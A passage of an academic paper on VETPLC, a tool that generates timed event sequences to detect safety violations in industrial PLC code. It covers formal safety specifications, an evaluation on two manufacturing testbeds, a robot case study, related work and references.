Next, for any event in Set_event whose starting time is within a certain range (i.e., its incoming edge is labeled with an invariant), the range is discretized using δ to create multiple versioned events. We then replace the original event with a set of versioned ones. For instance, since Part_AtConveyor is enabled 3 to 39.4 seconds after Deliver_Part, it is discretized to be a set {PACT+3, PACT+10, PACT+18, PACT+25, PACT+32, PACT+39} when δ is 5. Hence, we extend Set_event to be a new set Set′_event.

Then, we permute all the events in Set′_event to create sequences. Notice that in every permutation, only one versioned event from the same set can be chosen. The result of this PERMUTE is a set SEQS containing all candidate sequences. We further check each candidate SEQ to see if it contradicts the causalities indicated by TECG_in, and if so, it will be discarded. To do so, we iterate over each event ev in a sequence SEQ, and find all the solutions for ev on its hosting and-or graph TECG_in. A solution for ev is a path, from ev to a top-level vertex, which includes all of its prerequisites that are required to cause ev to happen. If any solution path is covered by the subsequence from the first element of SEQ to ev, we keep this candidate SEQ. Otherwise, it is removed from SEQS. Finally, we output the result SEQS as the generated timed event sequences.

For our motivating example, we can create a timed sequence, 1:Pallet_Sensor ↝ 2:¬Part_Sensor ↝ 3:CNC_Part_Ready ↝ 4:Robot_Ready ↝ 5:¬Part_AtConveyor ↝ 6:Part_AtConveyor_T+10 ↝ 7:RFID_IOComplete_T+20, which can lead to the safety violation due to the premature termination of 6:Part_AtConveyor_T+10. Detailed implementation can be found in Appendix D.

Selection of δ. A naive way of discretizing a time range is to merely consider its lower and upper bounds (i.e., δ = 1). Theoretically, this is sufficient to detect the possible presence of timing-related safety violations. However, it is too coarse-grained and can only tell if an error will occur when a machine operates at its maximum or minimum speed. On the contrary, it is in fact crucial to understand the range of machine speeds that can lead to errors. Such contextual evidence can help security investigators draw a better conclusion on whether a logic error is caused by attacks. For example, prior work [38] has correlated the narrowness of an error trigger with its malice. Thus, ideally, we expect to always select a larger δ. However, the increase in time slices also leads to growth in the total number of permutations. To understand how to strike a balance, we conduct an empirical study in the evaluation. Nevertheless, it is noteworthy that, while a better δ can provide informative evidence at lower cost, the selection of δ does not affect whether we can detect a safety defect.

B. Safety Specification

The event sequences that we generate can facilitate automated path exploration for testing PLC code. However, the fact that we can reach an unsafe state does not necessarily mean we can automatically detect the problem. To enable automated detection, we need to further specify certain safety rules and programmatically verify them at runtime. Prior work [54] has adopted linear temporal logic (LTL) to formally define safety requirements for ICSs.
However, at runtime, it is hard to enforce an LTL-based rule which requires an activity to be followed by another (e.g., overflow avoidance), because the absence of a required event during limited test time does not imply its absence at a later time. Although, in practice, these required actions must be accomplished within a certain amount of time, LTL is not capable of describing such temporal relations in a quantitative fashion. To address this limitation, we again use TPTL [26] to quantitatively express safety specifications.

Definition 3. Let P be a set of atomic logical proposition symbols about the system {p_1, p_2, ..., p_|P|}, e.g., sensor Pallet_Sensor is on, and let Σ = 2^P be a finite alphabet composed of these propositions. Then, the set of TPTL-based Safety Requirements is inductively defined by the grammar:

    π := x + c | c
    φ := p | π_1 ≤ π_2 | π_1 ≡_d π_2 | false | φ_1 → φ_2 | ○φ | φ_1 U φ_2 | x.φ

The grammar of TPTL is further explained in Appendix E. Table II demonstrates 5 typical classes of safety specifications, which have been studied by previous academic work or required by OSHA (Occupational Safety and Health Administration). We categorize the policies based on the root causes of industrial hazards. First, a majority of safety incidents are caused by dangerous machine-machine interactions, including machine collision and machines facing overflow or underflow due to upstream machines. Second, failure to separate humans from life-threatening machines may result in fatal accidents. Last but not least, individual machines, even without interaction with any other entities, can still result in critical damage because they operate spatially or temporally in unsafe zones.

TABLE II: Categories of Safety Specifications
    Typical Hazard  | Example Specification to Avoid Hazard                                                        | Formal Definition                                 | References
    Collision       | Whenever conveyor belt starts running, a robot arm cannot come down to pick up items.       | □(Conveyor_Running → ¬Robot_Pickup)               | TSV [54]
    Overflow        | Once a pallet enters a cell, the stopper must be retracted within 30 seconds to release it. | □tx.(Pallet → ◇ty.(Retract ∧ ty − tx ≤ 30s))      | Motivating Example
    Underflow       | When water purification starts, water level of tanks must not be below L.                   | □(Purify_Start → (water_level ≥ L))               | Chen et al. [33]
    Non-Separation  | When the gate for robot is opened, robot must stop working.                                  | □(Gate_Open → ¬Robot_On)                          | OSHA Instr. [59]
    Danger Zone     | Upon start, the frequency of a motor in a nuclear centrifuge is between 807 and 1210 Hz.    | □(Start → □(807 Hz ≤ speed ≤ 1210 Hz))            | Stuxnet Dossier [36]

C. Trace-based Verification

We carry out runtime verification based upon execution traces of PLC code. Note that, while in our testbeds all controllers (i.e., for PLCs, robots, CNCs) can physically operate and thus produce real events, in our simulations we only analyze PLC code while modeling and simulating the inputs (i.e., events) from remote devices. Particularly, we first run a PLC program repeatedly, while each time we exercise the code using an individual event sequence. To this end, we convert PLC ST programs into C code using the MATIEC compiler [13] and then utilize a PLC simulator [14] to execute the code. To produce execution traces, we further instrument the generated C code to dump all instructions and variable values that originated from PLC code. In the end, we conduct runtime verification for TPTL specifications on the traces.
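For the bounded-response pattern that recurs in Tables II and III, □tx.(A → ◇ty.(B ∧ ty − tx ≤ bound)), a trace-level check reduces to a simple scan over timestamped events. The sketch below illustrates only this small subset and is not VETPLC's actual monitor; the event names in the usage example follow scenario #1.

```python
from typing import List, Tuple

Event = Tuple[str, float]   # (type, time)

def holds_bounded_response(trace: List[Event], a: str, b: str, bound_s: float) -> bool:
    """Check: globally, every occurrence of event type `a` at time tx is followed by
    some event of type `b` at a time ty with tx <= ty <= tx + bound_s."""
    for typ, tx in trace:
        if typ != a:
            continue
        if not any(t == b and tx <= ty <= tx + bound_s for t, ty in trace):
            return False
    return True

# Usage: the conveyor-overflow rule (scenario #1) -- once a pallet enters the cell,
# the stopper must retract within 30 seconds.
trace = [("Pallet", 2.0), ("Retract_Stopper", 21.5), ("Pallet", 60.0)]
print(holds_bounded_response(trace, "Pallet", "Retract_Stopper", 30.0))  # False: 2nd pallet never released
```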
In theory, we can follow a prior approach [32] to perform comprehensive interpretation and translation of TPTL languages. However, since our safety specifications are defined at a high level and are usually straightforward, in practice our runtime monitor only focuses on the small subset that we use to describe safety requirements.

VII. EVALUATION

A. Experimental Setup

To evaluate the effectiveness and efficiency of our approach, we follow the methodology of previous studies [33], [43], [54] to test VETPLC on different PLC programs. However, in contrast to prior work that experimented on either synthesized PLC code without necessary physical contexts [43] or simple, isolated logic without machine interactions (e.g., traffic lights) [54], we apply VETPLC to real-world PLC programs that are tightly coupled with specific scenarios involving interconnected physical devices. To further demonstrate the generality of VETPLC, unlike Chen et al.'s work [33] that focused on only one particular testbed, we hope to evaluate our system on multiple scenarios for different ICS settings. This, however, is a challenging task because it requires a deep understanding of both the physical and logical domains of real-world control systems. Nevertheless, we developed 10 scenarios on two realistic testbeds, SMART and Fischertechnik, that have completely different physical compositions. The SMART testbed has been introduced in Section III. The Fischertechnik testbed (Figure 10) is a miniature that emulates consecutive processing of parts. It connects 4 cells and 2 push rams using multiple conveyors and sensors, while each cell consists of a PLC and a CNC machine. Interested readers can refer to Appendix F to learn more details about this testbed.

Table III lists the 10 scenarios from these two testbeds. We perform causality graph generation, invariant mining, event sequence construction and safety vetting on them. Our experiments have been conducted on a test machine equipped with an Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz and 16GB of physical memory. The OS is Ubuntu 16.04.4 LTS (64-bit).

B. Result Overview

To show the effectiveness of VETPLC, we would like to carry out comparative experiments. Unfortunately, existing work on PLC vetting, such as TSV [54] or SYMPLC [43], cannot generate event sequences to automatically analyze real-world event-driven PLC code. Nevertheless, these state-of-the-art analyzers can always be enhanced to handle event-driven code if they adopt ALLSEQS [27] to calculate all possible event permutations. Therefore, we implement an ALLSEQS-based baseline safety analyzer for comparison purposes.

We apply VETPLC and the baseline analyzer to our 10 scenarios, and study 3 methods that create event sequences: 1) the baseline (ALLSEQS), 2) using VETPLC to generate untimed event sequences (VETPLC-SEQS), and 3) applying VETPLC to timed sequence generation. When creating timed sequences, we select three different discretization parameters, δ = 2 (VETPLC-TSEQS-2), δ = 5 (VETPLC-TSEQS-5) and δ = 10 (VETPLC-TSEQS-10). Figure 6 depicts the number of sequences each method creates, while Table IV demonstrates whether the generated event sequences can lead to the discovery of safety violations. Further, for safety-related errors triggered by timed event sequences, the table also shows the ranges of corresponding machine speeds that can cause the problem.
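One plausible way to translate a violation-triggering delay window back into the machine-speed ranges reported in Table IV is to invert the relation t_job = job/v from Section V, with job calibrated from the mined duration at the configured speed. The sketch below makes that assumption explicit; VETPLC's exact bookkeeping may differ, and all numbers in the usage example are hypothetical.

```python
def speed_range_for_delay(mined_time_s: float, v_conf: float,
                          t_lo_s: float, t_hi_s: float,
                          v_safe: float, v_rated: float):
    """Invert t = (mined_time_s * v_conf) / v to map a violation-triggering delay
    window [t_lo_s, t_hi_s] back to a machine-speed window, clamped to the
    physically meaningful range [v_safe, v_rated]."""
    job = mined_time_s * v_conf          # work amount implied by the mined duration
    v_hi = job / t_lo_s                  # shorter delays correspond to higher speeds
    v_lo = job / t_hi_s
    return max(v_lo, v_safe), min(v_hi, v_rated)

# Hypothetical numbers: an operation mined at 24.5s under a 400 mm/s configuration,
# violating the specification only when it takes between 10s and 25s.
print(speed_range_for_delay(24.5, 400.0, 10.0, 25.0, v_safe=250.0, v_rated=3300.0))
# -> (392.0, 980.0) mm/s
```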
As shown in the table, pure ordering-based event permutations, ALLSEQS and VETPLC-SEQS, cannot lead to the hidden safety violations in timing-sensitive PLC code. We do observe, from Figure 6, a dramatic decrease (up to 96%) in event permutations for VETPLC-SEQS (green curve) compared to ALLSEQS (red curve). Although the decline in possible event sequences results in much less analysis runtime overhead, it does not affect whether a violation can be detected in our cases. However, provided that a timing-insensitive safety problem can be detected by ALLSEQS, VETPLC can achieve it two orders of magnitude faster.

In contrast, all the timed event sequences can result in safety problems. In fact, some of the error cases, such as conveyor overflow and frozen robots, can be observed occasionally from our testbeds during daily work but cannot be easily diagnosed manually. VETPLC not only helps uncover their root causes but also finds other, previously unknown, problems. Although the vulnerabilities detected in our work all originate from human mistakes, it is also possible for insiders to actively inject safety faults into PLC source code. Note, however, that VETPLC can detect any safety violations in PLC source code, regardless of whether they are introduced by developers or malicious logic injected by insiders.

TABLE III: Scenarios of Safety Violations
    #  | Scenario Name         | Testbed  | Description of Hazard                                                  | Safety Specification to Avoid Hazard
    1  | Conveyor Overflow #1  | SMART    | Motivating Example. See Section III                                    | □tx.(Pallet → ◇ty.(Retract_Stopper ∧ ty − tx ≤ 30s))
    2  | Robot in Danger Zone  | SMART    | Robot fails to return to its safe zone.                                | □tx.(¬Safe_Zone → ◇ty.(Safe_Zone ∧ ty − tx ≤ 60s))
    3  | Conveyor Overflow #2  | SMART    | Robot stops processing parts from conveyor due to signal conflicts.    | □tx.(Pallet → ◇ty.(Retract_Stopper ∧ ty − tx ≤ 30s))
    4  | Part-Gate Collision   | SMART    | A pallet collides with a closed gate.                                  | □(Pallet_AtGate → □Gate_Open)
    5  | CNC Overflow          | SMART    | CNC stops processing parts from gantry due to missing signals.         | □tx.(Part_In → ◇ty.(Part_Out ∧ ty − tx ≤ 5m))
    6  | Ram-Part Collision    | Fischer. | A ram starts pushing when a part has not fully entered the ram.        | □(Part_Entering → ¬Ram_Push)
    7  | CNC-Part Collision    | Fischer. | A part is passed to CNC when a preceding part is not fully discharged. | □(CNC_Busy → ¬Part_Arrival)
    8  | Conveyor Overflow #3  | Fischer. | Parts are pushed to conveyor prematurely.                              | □tx.(Part_Arrival → ◇ty.(Part_Arrival ∧ ty − tx ≥ 6s))
    9  | Conveyor Underflow    | Fischer. | A conveyor belt halts operation.                                       | □tx.(Part_Arrival → ◇ty.(Part_Arrival ∧ ty − tx ≤ 8.5s))
    10 | Ram-Part Collision #2 | Fischer. | Ram1 pushes a part to unprepared Ram2.                                 | □(Part_Entering → □Ram_Ready)

In addition, we notice that a finer-grained time discretization may lead to more precise error-triggering (speed range) constraints. For instance, for Scenario #8, the sequences produced by VETPLC-TSEQS-5 reveal that a push ram at speeds from 1714 to 2000 rpm can cause errors, while those of VETPLC-TSEQS-2 only indicate that it malfunctions at the minimum speed of 1714 rpm. Some cases, such as Scenario #7, may include multiple machines with variable speeds, and thus we compute the error-triggering ranges individually. Nevertheless, the precision improvement of speed ranges comes at a price. As we discretize time into more fractions, the amount of event sequences also grows significantly.
Figure 6 illustrates that, compared to ALLSEQS, VETPLC-TSEQS-2, VETPLC-TSEQS-5 and VETPLC-TSEQS-10 on average yield 38%, 93% and 226% of its sequences, respectively. Nonetheless, the increase of time fractions does not always lead to an improvement of error ranges. The difference between TSEQS-5 and TSEQS-10 is not as significant as that between TSEQS-2 and TSEQS-5. Yet the increase of permutations for TSEQS-10 is drastic. As a result, empirically, we can see that TSEQS-5 strikes a balance between efficiency and precision.

C. Case Study

We perform case studies on two scenarios. The study on Scenario #2 is presented here, while the study on Scenario #7 is elaborated in Appendix G.

Scenario Description. Scenario #2 depicts the interaction among a PLC, a robot and a CNC in Cell 2. Here, the robot carries a part into the CNC cabinet, places it on the CNC table and moves out. It then pauses at a temporary position and waits for further instructions from the PLC. Normally, the CNC senses a part's arrival from its table and notifies the PLC of the receipt. Then, the PLC signals the robot, allowing it to return to its safe zone, while the CNC begins to process the part.

Timed Event Causality Graph. Figure 7 illustrates the TECG constructed from PLC, robot and CNC (slave PLC) code. The causal relation between Deliver_Part_toCNC and Part_Delivered indicates the request and response between the PLC and the robot. The duration of Part_Present extracted from CNC code is 1 second. However, the controller code cannot reveal the implicit relation between the PLC sending a request to the robot and the CNC receiving a part, because the PLC does not directly send commands to the CNC. Fortunately, VETPLC can recover this dependency via invariant mining and thus introduce a new edge Deliver_Part_toCNC → Part_AtTable, depicted by the bold line. Besides, data mining also discovers the robot delivery time, corresponding to Robot_Start →[0.5s, 6.6s] Robot_Standby.

Automated Safety Vetting. The TECG helps reduce the amount of possible event permutations from 13700 to 446. We further obtain 2366, 8846 and 29246 timed sequences for TSEQS-2, TSEQS-5 and TSEQS-10, respectively. Using these timed sequences to exercise the PLC code, we discover a safety violation in which the robot, running at certain speeds, cannot return to its safe zone. Particularly, TSEQS-5 can provide a relatively precise error-triggering range [250 mm/sec, 959 mm/sec] with a relatively low time cost (8846 permutations).

Root Cause. This problem is caused by event timings and thus is not revealed by ordering-based sequences. Since Part_Present only lasts for 1 second, when the PLC receives Part_Delivered from the robot, the former event may have already terminated. Then, the PLC will not permit the robot to move back due to missing necessary signals. Such a problem can only be observed when the robot speed falls into the discovered range.

Security Implication. Our analysis results do not automatically infer the intent of safety violations, but they do serve as contextual evidence that can help investigators draw correct conclusions. Prior work [38] has indicated that attacks are likely to be triggered under very narrow conditions (e.g., logic bombs) to evade detection; Stuxnet [36] code injected by insiders runs only when the target system operates between 807 Hz and 1210 Hz, a unique frequency range used for nuclear centrifuges. Hence, if the vulnerabilities are injected by insiders, VETPLC must find their narrow triggering ranges.
Otherwise, we must not provide a misleading result implying the error can happen only when the robot runs at very low speeds [250 mm/s, 465 mm/s] or at its highest speed of 3300 mm/s. Instead, we must discover a precise error-triggering range, e.g., [250 mm/s, 959 mm/s] for the robot speed.

D. Runtime Performance

It takes on average 203s to construct the graphs for one scenario. The computation time is acceptable because our analyses are designed to be straightforward and real-world PLC code is not very complex. The runtime of trace-based verification is proportional to the number of testing sequences, and thus is comparable to that of ALLSEQS, while each run takes approximately 55 seconds.

Fig. 6: No. of Event Sequences

TABLE IV: Detection Results
    #  | ALLSEQS | VETPLC-SEQS | VETPLC-TSEQS-2        | VETPLC-TSEQS-5        | VETPLC-TSEQS-10
    1  | N       | N           | Y Robot:[3300, 3300]  | Y Robot:[550, 3300]   | Y Robot:[550, 3300]
    2  | N       | N           | Y Robot:[250, 465]    | Y Robot:[250, 959]    | Y Robot:[250, 1486]
    3  | N       | N           | Y Robot:[465, 465]    | Y Robot:[307, 959]    | Y Robot:[275, 1486]
    4  | N       | N           | Y Robot:[250, 467]    | Y Robot:[250, 399]    | Y Robot:[250, 467]
    5  | N       | N           | Y Robot:[3300, 3300]  | Y Robot:[550, 3300]   | Y Robot:[550, 3300]
    6  | N       | N           | Y Ram:[1714, 1714]    | Y Ram:[1714, 2000]    | Y Ram:[1714, 2000]
    7  | N       | N           | Y CNC1:[3273, 6000]   | Y CNC1:[2571, 6000]   | Y CNC1:[2571, 6000]
       |         |             |   CNC2:[1714, 2667]   |   CNC2:[1714, 4000]   |   CNC2:[1714, 4000]
    8  | N       | N           | Y Ram:[1714, 1714]    | Y Ram:[1714, 2000]    | Y Ram:[1714, 2000]
    9  | N       | N           | Y Ram:[2667, 6000]    | Y Ram:[2400, 6000]    | Y Ram:[2000, 6000]
    10 | N       | N           | Y Ram:[2667, 6000]    | Y Ram:[2000, 6000]    | Y Ram:[2000, 6000]

Fig. 7: A TECG of Case #2 (Robot in Danger Zone)

VIII. DISCUSSION

Scalability. Our testbeds are smaller in size, but they accurately represent certain plants that manufacture specific products. For instance, a small-scale plant, such as an aircraft seating factory consisting of 20 CNCs, often organizes its CNCs into multiple serial cells where up to 6 parallel machines work in the same cell on the same workloads. Thus, the amount of manufacturing steps and data communication in such a factory is comparable to that of ours.
We admit that once a manufacturing system is scaled up, more computation power will be required to conduct our analysis and data mining. To address this challenge, one possible solution is to take advantage of the inherent parallelism to scale the computation. Due to the hierarchical architecture of factory floors, it is possible to divide an entire plant into multiple relatively independent groups, each of which can be analyzed individually. The summarized results of individual groups can be combined to carry out an analysis of the entire factory.

Specific Challenges to PLC Code Analysis. When compared to analyzing programs in other domains (e.g., Android apps, web programs), the analysis of PLC code is inherently unique for three reasons. (a) PLC code controls multiple types of customized hardware constrained by unique physical limits. (b) PLC software follows a unique programming paradigm due to the introduction of PLC scan cycles. (c) Most importantly, PLC events are highly time-sensitive, due to the physical nature of machines. Such time sensitivity is the exact cause of certain safety problems discovered in our work.

IX. RELATED WORK

Safety Verification of PLC Code. Many prior efforts [24], [28], [30], [31], [42], [44], [57], [58], [61], [63], [65] have been made to statically verify logic code using model checkers [15], [21]. Further efforts have also been made to conduct runtime verification in an online [39], [45] or offline manner [35], [62]. More recently, symbolic execution [43], [54] has been enabled on PLC code. While TSV [54] conducted static symbolic execution on its temporal execution graphs, SymPLC [43] leveraged the OpenPLC [16] framework and the Cloud9 engine [4] to conduct dynamic analysis. In contrast, VETPLC aims to verify real-world PLC code, which is driven by events.

Mining Temporal Invariants. Synoptic [29] and Perfume [60] extracted temporal invariants from conventional system logs via data mining. Different from OS events, ICS events are created by distributed sources on the factory floor and are difficult to obtain. Recently, ARTINALI [25] mined temporal properties from smart meters and medical devices to enable intrusion detection. To detect anomalies in ICS, Chen et al. [33] managed to learn invariants from data traces of a water purification testbed. As a comparison, VETPLC also mines ICS invariants but addresses a different problem.

Exercising Event-Driven Programs. Anand et al. [27] proposed to generate GUI event sequences based upon concolic testing. Mirzaei et al. [55] correlated events with their handlers for generating Android-specific drivers. AppIntent [67] relied on the Android lifecycle model to produce event-space constraint graphs. Jensen et al. [46] built event sequences based upon concolic execution and an Android GUI model. Kudzu [66] developed a GUI explorer that randomly searches the Web event space. SymJS [51] discovered Web event sequences via feedback-directed exploration and dynamic taint analysis. SymRT [52] performed timing analysis for real-time Java systems based upon symbolic execution and model checking. Lee et al. [48] proposed to create test sequences from Modechart specifications. In contrast, VETPLC can automatically discover both event ordering and timing without predefined specifications.

Event Causality. Orpheus [34] modeled program behaviors based upon CPS events, and applied these models to anomaly detection. Zhang et al. [68] detected malware via the inference of triggering relations between events in network data.
Compared to the prior work which studied qualitative event causalities, VETPLC takes a step further and quantitatively recovers event timings that are critical for PLC code analysis.

X. CONCLUSION

We propose VETPLC, a novel approach to automatically produce timed event sequences for PLC code vetting. The evaluation of our prototype on two real-life ICS testbeds shows that VETPLC can effectively generate event sequences which automatically lead to hidden safety violations.

ACKNOWLEDGMENT

We would like to thank the anonymous reviewers and our shepherd, Prof. Daphne Yao, for their feedback in finalizing this paper. This research was supported in part by NSF Grants CNS-1544613, CNS-1544901, CNS-1544678 and CNS-1718952. Any opinions, findings, and conclusions made in this material are those of the authors and do not necessarily reflect the views of the funding agency.

REFERENCES

[1] ABB RAPID Veteran, a few questions about FANUC KAREL, https://www.robot-forum.com/robotforum/fanuc-robot-forum/abb-rapid-veteran-a-few-question-about-fanuc-karel/.
[2] Antlr, http://www.antlr.org/.
[3] Clang: a C language family frontend for LLVM, https://clang.llvm.org/.
[4] Cloud9 - Automated Software Testing at Scale, http://cloud9.epfl.ch/.
[5] Conveyor Belts Optimisation, https://www.standard-industrie.com/en/wp-content/themes/standardindustrie/img/CONVEYOR_BELT_OPTIMISATION.pdf.
[6] Conveyors and Falling Item Prevention, http://www.cisco-eagle.com/blog/2015/08/20/conveyors-and-falling-item-prevention/.
[7] Cooperation and Control: A Systems Perspective, https://me.engin.umich.edu/news-events/news/cooperation-and-control-systems-perspective.
[8] EtherNet/IP, https://en.wikipedia.org/wiki/EtherNet/IP.
[9] Foundations For Conveyor Safety Book, http://martinengineerings3.s3.amazonaws.com/www.martin-eng.de/download/FoundationsForConveyorSafetyBook.pdf.
[10] IEC 61131-3, https://en.wikipedia.org/wiki/IEC_61131-3.
[11] Industrial Control Systems Killed Once And Will Again, Experts Warn, https://www.wired.com/2008/04/industrial-cont/.
[12] Industry 4.0, https://en.wikipedia.org/wiki/Industry_4.0.
[13] MATIEC - IEC 61131-3 compiler, https://bitbucket.org/mjsousa/matiec.
[14] MATIEC examples, https://github.com/Felipeasg/matiec_examples.
[15] NuSMV: a new symbolic model checker, http://nusmv.fbk.eu/.
[16] OpenPLC Project, http://www.openplcproject.com/.
[17] PLC Manufacturer Rankings, http://automationprimer.com/2013/10/06/plc-manufacturer-rankings/.
[18] Programmable Logic Controller, https://en.wikipedia.org/wiki/Programmable_logic_controller.
[19] Robot kills worker at Volkswagen plant in Germany, https://www.theguardian.com/world/2015/jul/02/robot-kills-worker-at-volkswagen-plant-in-germany.
[20] Structured Text Tutorial to Expand Your PLC Programming Skills, http://www.plcacademy.com/structured-text-tutorial/.
[21] UPPAAL Home, http://www.uppaal.org/.
[22] ANSI/RIA R15.06: 2012 Safety Requirements for Industrial Robots and Robot Systems, Ann Arbor: Robotic Industries Association, 2012.
[23] M. Abrams and J. Weiss, Malicious Control System Cyber Security Attack Case Study: Maroochy Water Services, Australia, https://www.mitre.org/sites/default/files/pdf/08_1145.pdf.
[24] A. Aiken, M. Fähndrich, and Z. Su, Detecting Races in Relay Ladder Logic Programs, in Tools and Algorithms for the Construction and Analysis of Systems, 1998.
[25] M. R. Aliabadi, A. A. Kamath, J. Gascon-Samson, and K. Pattabiraman, ARTINALI: Dynamic Invariant Detection for Cyber-physical System Security, in Proceedings of the 2017 11th Joint Meeting on Foundations of Software Engineering (ESEC/FSE 2017), Sep 2017.
[26] R. Alur and T. A. Henzinger, A Really Temporal Logic, J. ACM, vol. 41, no. 1, Jan. 1994.
[27] S. Anand, M. Naik, M. J. Harrold, and H. Yang, Automated Concolic Testing of Smartphone Apps, in Proceedings of the ACM SIGSOFT 20th International Symposium on the Foundations of Software Engineering (FSE'12), 2012.
[28] B. Beckert, M. Ulbrich, B. Vogel-Heuser, and A. Weigl, Regression Verification for Programmable Logic Controller Software, in Formal Methods and Software Engineering, 2015.
[29] I. Beschastnikh, Y. Brun, S. Schneider, M. Sloan, and M. D. Ernst, Leveraging Existing Instrumentation to Automatically Infer Invariant-constrained Models, in Proceedings of the 19th ACM SIGSOFT Symposium and the 13th European Conference on Foundations of Software Engineering (ESEC/FSE'11), Sep 2011.
[30] S. Biallas, J. Brauer, and S. Kowalewski, Arcade.PLC: A Verification Platform for Programmable Logic Controllers, in Proceedings of the 27th IEEE/ACM International Conference on Automated Software Engineering (ASE 2012), Sep 2012.
[31] G. Canet, S. Couffin, J.-J. Lesage, A. Petit, and P. Schnoebelen, Towards the Automatic Verification of PLC Programs Written in Instruction List, in Proceedings of the IEEE International Conference on Systems, Man and Cybernetics, Feb 2000.
[32] M. Chai and B.-H. Schlingloff, A Rewriting based Monitoring Algorithm for TPTL, vol. 1032, pp. 61-72, Jan 2013.
[33] Y. Chen, C. M. Poskitt, and J. Sun, Learning from Mutants: Using Code Mutation to Learn and Monitor Invariants of a Cyber-Physical System, in 2018 IEEE Symposium on Security and Privacy (Oakland'18), May 2018.
[34] L. Cheng, K. Tian, and D. D. Yao, Orpheus: Enforcing Cyber-Physical Execution Semantics to Defend Against Data-Oriented Attacks, in Proceedings of the 33rd Annual Computer Security Applications Conference (ACSAC 2017), Dec 2017.
[35] J. Dzinic and C. Yao, Simulation-based Verification of PLC Programs: Master of Science Thesis in Production Engineering, Master's thesis, Chalmers University of Technology, Sweden, 2013.
[36] N. Falliere, L. O. Murchu, and E. Chien, W32.Stuxnet Dossier, https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf.
[37] G. Fedorko, V. Molnar, D. Marasova, A. Grincova, M. Dovica, J. Zivcak, T. Toth, and N. Husakova, Failure Analysis of Belt Conveyor Damage caused by the Falling Material. Part II: Application of Computer Metrotomography, Engineering Failure Analysis, vol. 34, pp. 431-442, 2013.
[38] Y. Fratantonio, A. Bianchi, W. Robertson, E. Kirda, C. Kruegel, and G. Vigna, TriggerScope: Towards Detecting Logic Bombs in Android Applications, in 2016 IEEE Symposium on Security and Privacy (Oakland), May 2016.
[39] L. Garcia, S. Zonouz, D. Wei, and L. P. de Aguiar, Detecting PLC control corruption via on-device runtime verification, in 2016 Resilience Week (RWS), Aug 2016.
[40] A. Ginter, The Top 20 Cyber Attacks Against Industrial Control Systems, https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf.
[41] N. Govil, A. Agrawal, and N. O. Tippenhauer, On Ladder Logic Bombs in Industrial Control Systems, in CyberICPS/SECPRE@ESORICS, Sep 2017.
[42] J. F. Groote, S. F. M. van Vlijmen, and J. W. C. Koorn, The Safety Guaranteeing System at Station Hoorn-Kersenboogerd, in Computer Assurance, 1995 (COMPASS'95): Systems Integrity, Software Safety and Process Security, Proceedings of the Tenth Annual Conference, Jun 1995.
[43] S. Guo, M. Wu, and C. Wang, Symbolic Execution of Programmable Logic Controller Code, in Proceedings of the 2017 11th Joint Meeting on Foundations of Software Engineering (ESEC/FSE 2017), Sep 2017.
[44] R. Huuck, Semantics and Analysis of Instruction List Programs, Electronic Notes in Theoretical Computer Science, vol. 115, pp. 3-18, 2005.
[45] H. Janicke, A. Nicholson, S. Webber, and A. Cau, Runtime-Monitoring for Industrial Control Systems, Electronics, vol. 4, no. 4, pp. 995-1017, Dec 2015.
[46] C. S. Jensen, M. R. Prasad, and A. Møller, Automated Testing with Targeted Event Sequence Generation, in Proceedings of the 2013 International Symposium on Software Testing and Analysis (ISSTA 2013), Jul 2013.
[47] I. Kovalenko, M. Saez, K. Barton, and D. Tilbury, SMART: A System-Level Manufacturing and Automation Research Testbed, Smart and Sustainable Manufacturing Systems, vol. 1, no. 1, pp. 232-261, 2017.
[48] N. H. Lee and S. D. Cha, Generating Test Sequences Using Symbolic Execution for Event-Driven Real-Time Systems, Microprocessors and Microsystems, vol. 27, pp. 523-531, 2003.
[49] R. M. Lee, M. J. Assante, and T. Conway, German Steel Mill Cyber Attack, https://ics.sans.org/media/ICS-CPPE-case-Study-2-German-Steelworks_Facility.pdf.
[50] R. Lee, M. Assante, and T. Conway, Analysis of the Cyber Attack on the Ukrainian Power Grid, https://www.nerc.com/pa/CI/ESISAC/Documents/E-ISAC_SANS_Ukraine_DUC_18Mar2016.pdf.
[51] G. Li, E. Andreasen, and I. Ghosh, SymJS: Automatic Symbolic Testing of JavaScript Web Applications, in Proceedings of the 22nd ACM SIGSOFT International Symposium on Foundations of Software Engineering (FSE 2014), Nov 2014.
[52] K. S. Luckow, C. S. Păsăreanu, and B. Thomsen, Symbolic Execution and Timed Automata Model Checking for Timing Analysis of Java Real-Time Systems, EURASIP Journal on Embedded Systems, vol. 2015, no. 1, Sep 2015.
[53] A. Martelli and U. Montanari, Additive AND/OR Graphs, in Proceedings of the 3rd International Joint Conference on Artificial Intelligence (IJCAI'73), Aug 1973.
[54] S. McLaughlin, S. Zonouz, D. Pohly, and P. McDaniel, A Trusted Safety Verifier for Process Controller Code, in Proceedings of the 2014 Network and Distributed System Security Symposium (NDSS'14), Feb 2014.
[55] N. Mirzaei, S. Malek, C. S. Păsăreanu, N. Esfahani, and R. Mahmood, Testing Android Apps Through Symbolic Execution, SIGSOFT Softw. Eng. Notes, vol. 37, no. 6, pp. 1-5, Nov. 2012.
[56] A. Montaqim, Top 14 industrial robot companies and how many robots they have around the world, https://roboticsandautomationnews.com/2015/07/21/top-8-industrial-robot-companies-and-how-many-robots-they-have-around-the-world/812/.
[57] J. Nellen, E. Ábrahám, and B. Wolters, A CEGAR Tool for the Reachability Analysis of PLC-Controlled Plants Using Hybrid Automata, in Formalisms for Reuse and Systems Integration, 2015.
[58] J. Nellen, K. Driessen, M. Neuhäußer, E. Ábrahám, and B. Wolters, Two CEGAR-based Approaches for the Safety Verification of PLC-controlled Plants, Information Systems Frontiers, vol. 18, no. 5, pp. 927-952, Oct. 2016.
APPENDIX

A. Teach Pendant Code of FANUC Robot

Figure 8 presents the robot code implemented using the teach pendant language. This program is triggered by a PLC event and passes a part from the CNC machine to the conveyor.

B. Implementation of Static Analysis

We have implemented our static analyses in 7K lines of C++ code and 5K lines of Java code. In particular, we convert PLC ST code into C programs via the MATIEC [13] compiler, and then leverage Clang [3] to enable our analyses. To analyze the teach pendant programs in the robot, we build a specific parser using Antlr [2] and then perform control-flow analysis on top of the generated AST.

Fig. 8: Robot Teach Pendant Code for Delivering Parts

    !Function only when receiving the signal
    IF DI[0:Deliver_Part@PLC]=OFF, JMP LBL[3]
    DO[6:Pickup_from_CNC1]=ON
